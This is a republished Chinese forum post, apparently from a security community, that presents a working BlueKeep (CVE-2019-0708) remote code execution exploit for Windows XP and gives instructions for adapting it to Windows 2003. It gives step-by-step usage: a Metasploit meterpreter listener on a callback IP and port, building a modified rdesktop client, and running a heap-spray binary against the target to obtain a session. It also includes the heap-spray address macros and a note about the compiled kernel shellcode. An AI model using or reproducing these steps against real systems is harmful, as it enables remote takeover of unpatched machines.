cve-2019-0708_bluekeep_xp_rce
2019-10-01 05:47:33 Author: bbs.pediy.com(查看原文) 阅读量:204 收藏

[原创]cve-2019-0708_bluekeep_xp_rce

1天前 318

[原创]cve-2019-0708_bluekeep_xp_rce

https://github.com/coolboy4me/cve-2019-0708_bluekeep_rce

前后花了3个月通过能够找到的各种开源资料,看雪论坛求助,实现了xp下面的稳定利用。03可以利用自己的机器,不具备通用性。

1. 运行 msfconsole meterpreter/multi/handler 监听192.168.116.133:6000

2. cd rdesktop-1.5.0 && make 

3. 修改config,配置回连ip和端口

192.168.116.133

6000

4. 执行 ./heap_spray 192.168.116.134 (134是xp的地址,内存大于等于2G)

5. msfconsole meterpreter 会得到session

ps:

shellcode/shellcode.asm 是内核shellcode源码,编译以后转成二进制,就是rdesktop-1.5.0\cf517d077e9c152120787eb6b251615b文件了,make的时候会直接编译进程序。

目前仅支持xp,需要xp的内存 >= 2G

如果需要支持2003,需要修改heap_spray.c 里面的 HEAP_SPRAY_ADDRESS 宏地址,经过反复测试,这个地址在03的不同系统版本,不同内存大小是不一样的。但是如果要测试

自己的机器的话,是可以成功在03上利用。不具备通用性。

heap_spray.c 

#ifdef _2003

#define HEAP_SPRAY_ADDRESS 0x953b09c0 //需要自己去windbg调试堆喷shellcode的地址 如果有朋友找到通用的解决方案欢迎提交issues

#define IcaChannelInputInternal_RET_OFFSET 0x268

#else

#define IcaChannelInputInternal_RET_OFFSET 0x274

#define HEAP_SPRAY_ADDRESS 0x88c969c0

#endif

测试03

1. 运行 msfconsole meterpreter/multi/handler 监听192.168.116.133:6000

2. cd rdesktop-1.5.0 && make 

3. 修改config,配置回连ip和端口

192.168.116.133

6000

4. 执行 ./_2003_heap_spray 192.168.116.135 (135是03的地址,内存大于等于2G)

5. msfconsole meterpreter 会得到session

[培训]《安卓高级研修班》彻底搞定函数抽取型壳!现在报名得源码和安卓8.1脱壳机!10月20日深圳专场不见不散!

最后于 17小时前 被coolboyme编辑 ,原因: 补充使用说明和源码附件


文章来源: https://bbs.pediy.com/thread-254804.htm
如有侵权请联系:admin#unsafe.sh